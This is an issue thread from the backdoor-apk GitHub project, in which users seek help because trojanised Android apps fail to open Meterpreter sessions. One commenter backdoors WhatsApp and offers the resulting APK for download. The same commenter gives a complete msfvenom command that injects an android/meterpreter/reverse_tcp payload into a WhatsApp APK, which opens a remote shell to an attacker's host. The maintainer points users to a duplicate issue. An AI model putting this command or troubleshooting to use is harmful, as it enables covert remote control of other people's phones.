### ISSUE TITLE
No session created

### ISSUE THREAD

**Issue by hackerboy23** [dana-at-cp/backdoor-apk#118]
Hello guys please help me everything work perfect without any error but when i start listener and open that backdoor apk no session create.

**Comment by hackerboy23** [comment]
@dana-at-cp

**Comment by hackerboy23** [comment]
reply motherfucker @dana-at-cp

**Comment by dana-at-cp** [comment]
@hackerboy23 easy young padawan. What Metasploit payload are you using?

**Comment by hackerboy23** [comment]
@dana-at-cp whenever i use reverse_tcp payload session never create

**Comment by dana-at-cp** [comment]
@hackerboy23 Ok. I'll see if I can re-create the issue.

**Comment by Stewarddeng** [comment]
i can't work too.everything work perfect.no session create .app is good ,can connect to internet.

**Comment by Stewarddeng** [comment]
https://github.com/dana-at-cp/backdoor-apk/issues/58
this you have run the whatsApp,today i try it like you.
version is 2.18.119
everything is good, i install backdoor-apk.sh generate apk later,but no session is create.
please help me.
run.log and WhatsAPP.apk(after backdoor-apk.sh) is here:
http://proxy.stewarddeng.com/index1.php
If you've downloaded,tell me please.i take it off.
i think maybe environment make this problem happen.

**Comment by Stewarddeng** [comment]
my Metasploit  is good.
i have check my lhost and lport is running.i use chrome check  Metasploit ,i have  see session.
i use meterpreter/reverse_tcp

**Comment by Stewarddeng** [comment]
i run it in msfvenom,finally it work,why backdoor-apk can't work.........
msfvenom --platform android -x whatsApp.apk -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -o after.apk

**Comment by dana-at-cp** [comment]
@Stewarddeng Thanks for the report. I've noticed some issues recently as well. I haven't had time to investigate but it's on my list.

**Comment by loveablefellow007** [comment]
Dana

**Comment by dana-at-cp** [comment]
@Stewarddeng If you got the WhatsApp APK from the play store then this is probably related to issue: #78 

If you got the APK somewhere else then I cannot help you.

**Comment by Stewarddeng** [comment]
i got the WhatsApp APK from this: https://www.whatsapp.com/download/

**Comment by dana-at-cp** [comment]
@Stewarddeng This is a duplicate of #78

Look at the end of run.log for more information. Feel free to research and contribute a fix or workaround.

**Comment by loveablefellow007** [comment]
Can u tell about this error
